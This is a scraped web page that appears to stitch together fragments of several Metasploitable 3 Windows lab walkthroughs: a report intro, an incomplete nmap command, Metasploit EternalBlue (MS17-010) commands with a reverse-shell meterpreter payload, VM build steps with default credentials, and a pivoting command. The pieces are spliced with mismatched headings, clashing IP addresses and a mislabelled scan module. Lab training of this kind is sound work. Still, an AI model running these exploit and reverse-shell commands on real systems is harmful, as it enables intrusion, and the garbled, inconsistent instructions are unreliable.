Skip to main content

Metasploitable 3 Windows Walkthrough __top__ [ 2025 ]

🛡️ Penetration Testing Report: Metasploitable 3 (Windows) 1. Executive Summary

This assessment details the security posture of the Metasploitable 3 Windows virtual machine. The objective of this exercise was to identify security vulnerabilities, demonstrate exploitation vectors, and provide remediation steps to secure the asset. Multiple high and critical-severity vulnerabilities were identified, including unauthenticated remote code execution and weak credential policies. Target Details: Operating System: Windows Server 2008 R2 (Metasploitable 3) IP Address: 192.168.1.36 (Example IP) Testing Machine: Kali Linux 2. Methodology & Phases

The engagement followed the standard penetration testing execution standard: Reconnaissance & Scanning: Discovering live hosts and open ports. Vulnerability Analysis: Identifying outdated software and weak configurations. Exploitation: Gaining initial access to the system. Privilege Escalation: Elevating standard user access to administrative rights. 3. Detailed Walkthrough 🔍 Phase 1: Scanning & Enumeration

The initial step involved identifying exposed attack surfaces using Nmap. nmap -sV -sC -A Use code with caution. Copied to clipboard

Metasploitable 3 (Windows) Write-up — Part I: FTP (PORT 21) metasploitable 3 windows walkthrough

5. SMB Exploit – EternalBlue (MS17-010) – if present

Check if vulnerable:

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 > set RHOSTS 192.168.56.102
msf6 > run

If vulnerable, exploit:

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set RHOSTS 192.168.56.102
msf6 > set LHOST 192.168.56.1
msf6 > run

Metasploitable 3 Windows Walkthrough: A Practical Penetration Testing Guide

Step-by-Step Build

  1. Clone the repository (run PowerShell as Administrator):

    git clone https://github.com/rapid7/metasploitable3
cd metasploitable3

  2. Set up the environment:

    .\setup.ps1

    This downloads the Windows ISO (Service Pack 1) and configures Vagrant.

  3. Build the VM:

    vagrant up

    This takes 30–45 minutes. Packer provisions Windows, installs vulnerable software (Java 6, Tomcat 6, MySQL 5.1, etc.), and disables the firewall.

  4. Access the VM:

    • Username: vagrant
    • Password: vagrant
    • IP address: 192.168.56.103 (default – check with ipconfig inside the VM)

Your attacking machine (Kali Linux) should be on the same 192.168.56.0/24 network.

Port knock detection

use auxiliary/scanner/portscan/ack

Pivot to other hosts

run autoroute -s 192.168.1.0/24 background